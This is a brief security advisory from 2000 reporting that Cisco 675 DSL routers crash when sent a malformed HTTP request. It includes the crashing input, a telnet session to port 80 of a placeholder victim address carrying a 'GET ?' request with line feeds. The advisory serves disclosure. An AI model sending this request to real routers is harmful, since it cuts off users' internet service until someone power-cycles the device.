Cisco 675 DSL Router Vulnerable to DoS Attack

Reported November 28, 2000 by CDI

VERSIONS AFFECTED
  • Cisco 675 DSL Router

DESCRIPTION

Cisco 675 DSL Routers are vulnerable to a denial of service attack.  A malicious attacker could cause the router to crash and require a power cycle to restore Internet services.  

Demonstration

By establishing a Telnet session to the Web Administrator interface via HTTP TCP port 80 an attacker can cause the router to crash.

Here is an example as supplied by CDI;

-----------------------------------------

Telnet victim.ip.address:80
Trying victim.ip.address....
Connected to victim.ip.address
Escape Character is '^\}'.

GET ? \[LF\]\[LF\]

------------------------------------

VENDOR RESPONSE

Cisco has responded to this issue and will be releasing an advisory and fix shortly.

CREDIT
Discovered by
CDI

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish